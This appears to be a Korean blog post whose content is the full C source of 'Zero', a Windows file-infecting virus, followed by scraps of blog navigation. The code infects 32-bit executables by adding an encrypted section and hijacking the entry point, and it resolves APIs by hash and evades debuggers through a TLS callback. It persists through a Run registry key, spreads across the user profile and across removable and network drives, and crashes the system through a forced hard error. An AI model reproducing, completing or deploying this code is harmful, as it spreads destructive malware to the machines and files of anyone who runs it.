제로 바이러스 Security

#include <stdio.h>
#include <Windows.h>
#include <ImageHlp.h>
#include "ntdll.h"

#pragma comment(lib,"imagehlp.lib")
#pragma comment(lib,"ntdll.lib")

#pragma comment(linker,"/include:__tls_used")
#pragma section(".CRT$XLB",read)

#define Align(Value,Alignment) (((Value+Alignment-1)/Alignment)*Alignment)
#define VIRUS_KEY 0xF4
#define VIRUS_FLAG ((VIRUS_KEY^0x7FFFFFFF)^0xF0F0F0F0)

typedef DWORD (WINAPI *pExpandEnvironmentStringsA)(
LPCSTR lpSrc,
LPSTR lpDst,
DWORD nSize
);

typedef HANDLE (WINAPI *pCreateFileA)(
LPCSTR lpFileName,
DWORD dwDesiredAccess,
DWORD dwShareMode,
LPSECURITY_ATTRIBUTES lpSecurityAttributes,
DWORD dwCreationDisposition,
DWORD dwFlagsAndAttributes,
HANDLE hTemplateFile
);

typedef BOOL (WINAPI *pWriteFile)(
HANDLE hFile,
LPCVOID lpBuffer,
DWORD nNumberOfBytesToWrite,
LPDWORD lpNumberOfBytesWritten,
LPOVERLAPPED lpOverlapped
);

typedef LPVOID (WINAPI *pVirtualAlloc)(
LPVOID lpAddress,
SIZE_T dwSize,
DWORD flAllocationType,
DWORD flProtect
);

typedef BOOL (WINAPI *pCloseHandle)(HANDLE Handle);

typedef BOOL (WINAPI *pVirtualFree)(
LPVOID lpAddress,
SIZE_T dwSize,
DWORD dwFreeType
);

typedef BOOL (WINAPI *pCreateProcessA)(
LPCSTR lpApplicationName,
LPSTR lpCommandLine,
LPSECURITY_ATTRIBUTES lpProcessAttributes,
LPSECURITY_ATTRIBUTES lpThreadAttributes,
BOOL bInheritHandles,
DWORD dwCreationFlags,
LPVOID lpEnvironment,
LPCSTR lpCurrentDirectory,
LPSTARTUPINFOA lpStartupInfo,
LPPROCESS_INFORMATION lpProcessInformation
);

typedef enum _HARDERROR_RESPONSE_OPTION
{
OptionAbortRetryIgnore,
OptionOk,
OptionOkCancel,
OptionRetryCancel,
OptionYesNo,
OptionYesNoCancel,
OptionShutdownSystem,
OptionOkNoWait,
OptionCancelTryContinue
}HARDERROR_RESPONSE_OPTION;

typedef enum _HARDERROR_RESPONSE
{
ResponseReturnToCaller,
ResponseNotHandled,
ResponseAbort,
ResponseCancel,
ResponseIgnore,
ResponseNo,
ResponseOk,
ResponseRetry,
ResponseYes,
ResponseTryAgain,
ResponseContinue
}HARDERROR_RESPONSE;

extern "C" NTSTATUS NTAPI NtRaiseHardError(
NTSTATUS ErrorStatus,
ULONG NumberOfParameters,
ULONG UnicodeStringParameterMask,
PULONG_PTR Parameters,
ULONG ValidResponseOptions,
PULONG Response
);

PVOID VirusFile;
ULONG VirusSize;

PIMAGE_SECTION_HEADER WINAPI AddSection(PVOID Image,PSTR SectionName,ULONG SectionSize,ULONG Characteristics)
{
PIMAGE_DOS_HEADER pIDH;
PIMAGE_NT_HEADERS pINH;
PIMAGE_SECTION_HEADER pISH;

ULONG i;

pIDH=(PIMAGE_DOS_HEADER)Image;

if(pIDH->e_magic!=IMAGE_DOS_SIGNATURE)
{
return NULL;
}

pINH=(PIMAGE_NT_HEADERS)((PUCHAR)Image+pIDH->e_lfanew);

if(pINH->Signature!=IMAGE_NT_SIGNATURE)
{
return NULL;
}

pISH=(PIMAGE_SECTION_HEADER)(pINH+1);
i=pINH->FileHeader.NumberOfSections;

memset(&pISH[i],0,sizeof(IMAGE_SECTION_HEADER));

pISH[i].Characteristics=Characteristics;
pISH[i].PointerToRawData=Align(pISH[i-1].PointerToRawData+pISH[i-1].SizeOfRawData,pINH->OptionalHeader.FileAlignment);
pISH[i].VirtualAddress=Align(pISH[i-1].VirtualAddress+pISH[i-1].Misc.VirtualSize,pINH->OptionalHeader.SectionAlignment);
pISH[i].SizeOfRawData=Align(SectionSize,pINH->OptionalHeader.SectionAlignment);
pISH[i].Misc.VirtualSize=SectionSize;

memcpy(pISH[i].Name,SectionName,8);

pINH->FileHeader.NumberOfSections++;
pINH->OptionalHeader.SizeOfImage=pISH[i].VirtualAddress+pISH[i].Misc.VirtualSize;

pINH->OptionalHeader.CheckSum=0;
return &pISH[i];
}

int WINAPI VirusCode()
{
PIMAGE_DOS_HEADER pIDH;
PIMAGE_NT_HEADERS pINH;
PIMAGE_EXPORT_DIRECTORY pIED;

PPEB Peb;
PLDR_DATA_TABLE_ENTRY Ldr;

PVOID Buffer,Module,Kernel32Base;
ULONG i,Hash,FileSize,EntryPointRva,VirusRva,write;

PUCHAR EncryptedVirus,DecryptedVirus,ptr;
PULONG Function,Name;
PUSHORT Ordinal;

FARPROC EntryPoint; // Original entry point
HANDLE hFile;

STARTUPINFOA si;
PROCESS_INFORMATION pi;

pExpandEnvironmentStringsA fnExpandEnvironmentStringsA;
pCreateFileA fnCreateFileA;
pWriteFile fnWriteFile;
pVirtualAlloc fnVirtualAlloc;
pCloseHandle fnCloseHandle;
pVirtualFree fnVirtualFree;
pCreateProcessA fnCreateProcessA;

char FilePath[]={'%','t','e','m','p','%','\\','Z','e','r','o','.','e','x','e',0},FileName[260];

__asm
{
mov eax,0x41414141
mov EntryPointRva,eax

mov eax,0x42424242
mov VirusRva,eax

mov eax,0x43434343
mov FileSize,eax
}

Peb=NtCurrentPeb(); // Get the PEB
Ldr=CONTAINING_RECORD(Peb->Ldr->InMemoryOrderModuleList.Flink,LDR_DATA_TABLE_ENTRY,InMemoryOrderLinks.Flink); // Read the loader data

Module=Ldr->DllBase; // Process executable

Ldr=CONTAINING_RECORD(Ldr->InMemoryOrderLinks.Flink,LDR_DATA_TABLE_ENTRY,InMemoryOrderLinks.Flink); // ntdll (not used)
Ldr=CONTAINING_RECORD(Ldr->InMemoryOrderLinks.Flink,LDR_DATA_TABLE_ENTRY,InMemoryOrderLinks.Flink); // kernel32

Kernel32Base=Ldr->DllBase; // Store the address of kernel32

pIDH=(PIMAGE_DOS_HEADER)Kernel32Base;
pINH=(PIMAGE_NT_HEADERS)((PUCHAR)Kernel32Base+pIDH->e_lfanew);

// Get the export directory of kernel32

pIED=(PIMAGE_EXPORT_DIRECTORY)((PUCHAR)Kernel32Base+pINH->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);

Function=(PULONG)((PUCHAR)Kernel32Base+pIED->AddressOfFunctions);
Name=(PULONG)((PUCHAR)Kernel32Base+pIED->AddressOfNames);

Ordinal=(PUSHORT)((PUCHAR)Kernel32Base+pIED->AddressOfNameOrdinals);

// Loop over the function names

for(i=0;i<pIED->NumberOfNames;i++)
{
PUCHAR ptr=(PUCHAR)Kernel32Base+Name[i]; // Pointer to function name
ULONG Hash=0;

// Compute the hash

while(*ptr)
{
Hash=((Hash<<8)+Hash+*ptr)^(*ptr<<16);
ptr++;
}

// Hash of ExpandEnvironmentStringsA

if(Hash==0x575d1e20)
{
fnExpandEnvironmentStringsA=(pExpandEnvironmentStringsA)((PUCHAR)Kernel32Base+Function[Ordinal[i]]);
}

// Hash of CreateFileA

if(Hash==0xd83eb415)
{
fnCreateFileA=(pCreateFileA)((PUCHAR)Kernel32Base+Function[Ordinal[i]]);
}

// Hash of WriteFile

if(Hash==0xa5e7378b)
{
fnWriteFile=(pWriteFile)((PUCHAR)Kernel32Base+Function[Ordinal[i]]);
}

// Hash of VirtualAlloc

if(Hash==0xa15d96d2)
{
fnVirtualAlloc=(pVirtualAlloc)((PUCHAR)Kernel32Base+Function[Ordinal[i]]);
}

// Hash of CloseHandle

if(Hash==0x7dfbd342)
{
fnCloseHandle=(pCloseHandle)((PUCHAR)Kernel32Base+Function[Ordinal[i]]);
}

// Hash of VirtualFree

if(Hash==0x6f043b69)
{
fnVirtualFree=(pVirtualFree)((PUCHAR)Kernel32Base+Function[Ordinal[i]]);
}

// Hash of CreateProcessA

if(Hash==0xae3b3c74)
{
fnCreateProcessA=(pCreateProcessA)((PUCHAR)Kernel32Base+Function[Ordinal[i]]);
}
}

EncryptedVirus=(PUCHAR)Module+VirusRva; // Get the virus body
Buffer=fnVirtualAlloc(NULL,FileSize,MEM_COMMIT|MEM_RESERVE,PAGE_READWRITE); // Allocate buffer

if(Buffer)
{
DecryptedVirus=(PUCHAR)Buffer;

// Decrypt the virus

for(i=0;i<FileSize;i++)
{
DecryptedVirus[i]=EncryptedVirus[i]^VIRUS_KEY;
}

fnExpandEnvironmentStringsA(FilePath,FileName,sizeof(FileName));

// Drop the virus in temp folder

hFile=fnCreateFileA(FileName,GENERIC_READ|GENERIC_WRITE,FILE_SHARE_READ|FILE_SHARE_WRITE,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_SYSTEM,NULL);

if(hFile!=INVALID_HANDLE_VALUE)
{
// Write the virus to file

if(fnWriteFile(hFile,Buffer,FileSize,&write,NULL))
{
fnCloseHandle(hFile); // Close the file handle
fnVirtualFree(Buffer,0,MEM_RELEASE); // Free the buffer

ptr=(PUCHAR)&si;

// Zero the structures

for(i=0;i<sizeof(si);i++)
{
ptr[i]=0;
}

ptr=(PUCHAR)&pi;

for(i=0;i<sizeof(pi);i++)
{
ptr[i]=0;
}

// Run the virus executable

if(fnCreateProcessA(FileName,NULL,NULL,NULL,FALSE,0,NULL,NULL,&si,&pi))
{
fnCloseHandle(pi.hThread);
fnCloseHandle(pi.hProcess);
}
}
}
}

// Call the original entry point

EntryPoint=(FARPROC)((PUCHAR)Module+EntryPointRva);
return EntryPoint();
}

void WINAPI VirusEnd()
{
return;
}

BOOL WINAPI IsValidExecutable(HANDLE hFile,PULONG SectionAlignment)
{
PIMAGE_DOS_HEADER pIDH;
PIMAGE_NT_HEADERS pINH;

PVOID Buffer;
ULONG FileSize,read;

FileSize=GetFileSize(hFile,NULL);
Buffer=VirtualAlloc(NULL,FileSize,MEM_COMMIT|MEM_RESERVE,PAGE_READWRITE);

if(!Buffer)
{
return FALSE;
}

if(!ReadFile(hFile,Buffer,FileSize,&read,NULL))
{
VirtualFree(Buffer,0,MEM_RELEASE);
return FALSE;
}

__try
{
pIDH=(PIMAGE_DOS_HEADER)Buffer;

if(pIDH->e_magic!=IMAGE_DOS_SIGNATURE)
{
VirtualFree(Buffer,0,MEM_RELEASE);
return FALSE;
}

pINH=(PIMAGE_NT_HEADERS)((PUCHAR)Buffer+pIDH->e_lfanew);

if(pINH->Signature!=IMAGE_NT_SIGNATURE)
{
VirtualFree(Buffer,0,MEM_RELEASE);
return FALSE;
}

// Make sure it is 32-bit program

if(pINH->FileHeader.Machine!=IMAGE_FILE_MACHINE_I386)
{
VirtualFree(Buffer,0,MEM_RELEASE);
return FALSE;
}

if(pINH->FileHeader.Characteristics & IMAGE_FILE_DLL)
{
VirtualFree(Buffer,0,MEM_RELEASE);
return FALSE;
}

if(pINH->OptionalHeader.LoaderFlags==VIRUS_FLAG)
{
VirtualFree(Buffer,0,MEM_RELEASE);
return FALSE;
}

if(pINH->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR].VirtualAddress)
{
VirtualFree(Buffer,0,MEM_RELEASE);
return FALSE;
}

if(pINH->OptionalHeader.Subsystem==IMAGE_SUBSYSTEM_WINDOWS_CUI || pINH->OptionalHeader.Subsystem==IMAGE_SUBSYSTEM_WINDOWS_GUI)
{
if(SectionAlignment)
{
*SectionAlignment=pINH->OptionalHeader.SectionAlignment;
}

VirtualFree(Buffer,0,MEM_RELEASE);
return TRUE;
}
}

__except(EXCEPTION_EXECUTE_HANDLER)
{
VirtualFree(Buffer,0,MEM_RELEASE);
return FALSE;
}

VirtualFree(Buffer,0,MEM_RELEASE);
return FALSE;
}

void WINAPI InfectFile(PSTR FileName)
{
PIMAGE_DOS_HEADER pIDH;
PIMAGE_NT_HEADERS pINH;
PIMAGE_SECTION_HEADER pISH;

HANDLE hFile,hMap;
PVOID MappedFile;
ULONG i,FileSize,SectionSize,CodeSize,SectionAlignment,AlignedSize,OldChecksum,NewChecksum;

PUCHAR CodeAddress,VirusAddress,ptr;

hFile=CreateFile(FileName,GENERIC_READ|GENERIC_WRITE,FILE_SHARE_READ|FILE_SHARE_WRITE,NULL,OPEN_EXISTING,0,NULL);

if(hFile!=INVALID_HANDLE_VALUE)
{
if(!IsValidExecutable(hFile,&SectionAlignment))
{
NtClose(hFile);
return;
}

CodeSize=(ULONG)VirusEnd-(ULONG)VirusCode;
SectionSize=CodeSize+VirusSize;

FileSize=GetFileSize(hFile,NULL);
AlignedSize=FileSize+Align(SectionSize,SectionAlignment); // File size need to be aligned. Otherwise the program will not run after infection.

hMap=CreateFileMapping(hFile,NULL,PAGE_READWRITE,0,AlignedSize,NULL);

if(hMap)
{
MappedFile=MapViewOfFile(hMap,FILE_MAP_ALL_ACCESS,0,0,0);

if(MappedFile)
{
pIDH=(PIMAGE_DOS_HEADER)MappedFile;
pINH=(PIMAGE_NT_HEADERS)((PUCHAR)MappedFile+pIDH->e_lfanew);

// Add a new section

pISH=AddSection(MappedFile,"Zero",SectionSize,IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_EXECUTE);

if(pISH)
{
ptr=(PUCHAR)MappedFile+pISH->PointerToRawData;

CodeAddress=ptr;
VirusAddress=CodeAddress+CodeSize;

memcpy(CodeAddress,VirusCode,CodeSize); // Write the virus code to the file
memcpy(VirusAddress,VirusFile,VirusSize); // Write the virus body to the file

// Fill up placeholders

while(1)
{
if(*ptr==0xb8 && *(PULONG)(ptr+1)==0x41414141)
{
*(PULONG)(ptr+1)=pINH->OptionalHeader.AddressOfEntryPoint;
break;
}

ptr++;
}

ptr=(PUCHAR)MappedFile+pISH->PointerToRawData;

while(1)
{
if(*ptr==0xb8 && *(PULONG)(ptr+1)==0x42424242)
{
*(PULONG)(ptr+1)=(ULONG)VirusAddress-pISH->PointerToRawData+pISH->VirtualAddress-(ULONG)MappedFile;
break;
}

ptr++;
}

ptr=(PUCHAR)MappedFile+pISH->PointerToRawData;

while(1)
{
if(*ptr==0xb8 && *(PULONG)(ptr+1)==0x43434343)
{
*(PULONG)(ptr+1)=VirusSize;
break;
}

ptr++;
}

// Encrypt the virus

for(i=0;i<VirusSize;i++)
{
VirusAddress[i]^=VIRUS_KEY;
}

pINH->OptionalHeader.AddressOfEntryPoint=(ULONG)CodeAddress-pISH->PointerToRawData+pISH->VirtualAddress-(ULONG)MappedFile; // Set the entry point
pINH->OptionalHeader.LoaderFlags=VIRUS_FLAG; // Set the infection flag. Since Windows no longer use loader flag, we can use this to store our infection flag.

if(CheckSumMappedFile(MappedFile,AlignedSize,&OldChecksum,&NewChecksum))
{
pINH->OptionalHeader.CheckSum=NewChecksum; // Correct the checksum
}

FlushViewOfFile(MappedFile,0); // Flush the changes into file
UnmapViewOfFile(MappedFile); // Unmap the file
}
}
}
}

NtClose(hMap);
NtClose(hFile);
}

void WINAPI SearchFile(PSTR Directory)
{
HANDLE hFind;
WIN32_FIND_DATA FindData;

char SearchName[1024],FullPath[1024];
LARGE_INTEGER delay;

delay.QuadPart=(__int64)-10*10000;

memset(SearchName,0,sizeof(SearchName));
memset(&FindData,0,sizeof(WIN32_FIND_DATA));

sprintf(SearchName,"%s\\*",Directory);

hFind=FindFirstFile(SearchName,&FindData);

if(hFind!=INVALID_HANDLE_VALUE)
{
while(FindNextFile(hFind,&FindData))
{
if(FindData.cFileName[0]=='.')
{
continue;
}

memset(FullPath,0,sizeof(FullPath));
sprintf(FullPath,"%s\\%s",Directory,FindData.cFileName);

if(FindData.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY)
{
SearchFile(FullPath);
}

else
{
InfectFile(FullPath);
}

NtDelayExecution(FALSE,&delay);
}

FindClose(hFind);
}
}

void NTAPI TlsCallback(PVOID Module,ULONG Reason,PVOID Context)
{
HKEY hKey;
char ModulePath[1024],TempPath[60];

PPEB Peb=NtCurrentPeb();
ULONG_PTR DebugPort=0;

if(Reason!=DLL_PROCESS_ATTACH)
{
return;
}

if(Peb->BeingDebugged)
{
NtTerminateProcess(NtCurrentProcess(),0);
while(1);
}

if(NT_SUCCESS(NtQueryInformationProcess(NtCurrentProcess(),ProcessDebugPort,&DebugPort,sizeof(ULONG_PTR),NULL)))
{
if(DebugPort)
{
NtTerminateProcess(NtCurrentProcess(),0);
while(1);
}
}

GetModuleFileName(NULL,ModulePath,sizeof(ModulePath));

ExpandEnvironmentStrings("%temp%\\Zero.exe",TempPath,sizeof(TempPath));
CopyFile(ModulePath,TempPath,FALSE); // Copy the virus to temp folder

// Add the virus to registry

if(!RegCreateKey(HKEY_CURRENT_USER,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",&hKey))
{
RegSetValueEx(hKey,"Zero",0,REG_SZ,(PUCHAR)TempPath,sizeof(TempPath));
RegCloseKey(hKey);
}
}

__declspec(allocate(".CRT$XLB")) PIMAGE_TLS_CALLBACK TlsCallbackAddress[]={TlsCallback,NULL};

DWORD WINAPI Zero(PVOID p)
{
BOOLEAN bl;
LARGE_INTEGER delay;

ULONG Response;

PPEB Peb=NtCurrentPeb();
ULONG_PTR DebugPort=0;

delay.QuadPart=(__int64)-10*10000;

while(1)
{
if(Peb->BeingDebugged)
{
break;
}

if(NT_SUCCESS(NtQueryInformationProcess(NtCurrentProcess(),ProcessDebugPort,&DebugPort,sizeof(ULONG_PTR),NULL)))
{
if(DebugPort)
{
break;
}
}

NtDelayExecution(FALSE,&delay);
}

RtlAdjustPrivilege(19,TRUE,FALSE,&bl);
NtRaiseHardError(0xC000026A,0,0,NULL,OptionShutdownSystem,&Response);

while(1);
}

DWORD WINAPI InfectUserProfile(PVOID p)
{
char UserProfile[1024];
LARGE_INTEGER delay;

delay.QuadPart=(__int64)-600000*10000;
GetEnvironmentVariable("userprofile",UserProfile,sizeof(UserProfile)); // Get the path of user profile

while(1)
{
SearchFile(UserProfile); // Search for files to infect
NtDelayExecution(FALSE,&delay);
}
}

DWORD WINAPI InfectDrives(PVOID p)
{
ULONG DriveType;
char drives[1024],*str;

LARGE_INTEGER delay;

delay.QuadPart=(__int64)-600000*10000;

while(1)
{
memset(drives,0,sizeof(drives));

GetLogicalDriveStrings(sizeof(drives),drives); // Get all drives
str=drives;

while(*str)
{
DriveType=GetDriveType(str); // Check the drive type

// Infect removable and network drives

if(DriveType==DRIVE_REMOVABLE || DriveType==DRIVE_REMOTE)
{
SearchFile(str); // Search for files to infect
}

str+=strlen(str)+1; // Get the next drive
}

NtDelayExecution(FALSE,&delay);
}
}

int WINAPI WinMain(HINSTANCE hInst,HINSTANCE hPrev,LPSTR lpCmdLine,int nCmdShow)
{
HANDLE hFile;
ULONG read,op;

CreateMutex(NULL,TRUE,"{755842AD-901B-482D-81B3-010C4EB22197}");

if(GetLastError()==ERROR_ALREADY_EXISTS)
{
NtTerminateProcess(NtCurrentProcess(),0);
while(1);
}

hFile=CreateFile(_pgmptr,GENERIC_READ,FILE_SHARE_READ,NULL,OPEN_EXISTING,0,NULL);

if(hFile!=INVALID_HANDLE_VALUE)
{
VirusSize=GetFileSize(hFile,NULL);
VirusFile=VirtualAlloc(NULL,VirusSize,MEM_COMMIT|MEM_RESERVE,PAGE_READWRITE);

if(VirusFile)
{
if(!ReadFile(hFile,VirusFile,VirusSize,&read,NULL))
{
NtClose(hFile);
return -1;
}
}

NtClose(hFile);
VirtualProtect(VirusFile,VirusSize,PAGE_READONLY,&op); // Protect the virus data
}

// Create worker threads

CreateThread(NULL,0,Zero,NULL,0,NULL);
CreateThread(NULL,0,InfectUserProfile,NULL,0,NULL);
CreateThread(NULL,0,InfectDrives,NULL,0,NULL);

MessageBox(NULL,"You have been owned by Zero virus!","Zero virus by zwclose7",MB_ICONWARNING);

NtTerminateThread(NtCurrentThread(),0); // Terminate the current thread
while(1);
}


C:\Windows\system32\SHELL32.dll..IconIndex=3..

[InternetShortcut]..URL=http://www.m.vxv.kr/..IDList=..HotKey=0..IconFile=C:\Windows\system32\SHELL32.dll..IconIndex=3..[{000214A0-0000-0000-C000-000000000046}]..Prop3=19,2..

C# 동영상 플레이어 C++/C#/MFC/Windows


git branch



타이머


1 2 3 4 5 6 7 8 9 10 다음



통계 위젯 (화이트)

32
17
3628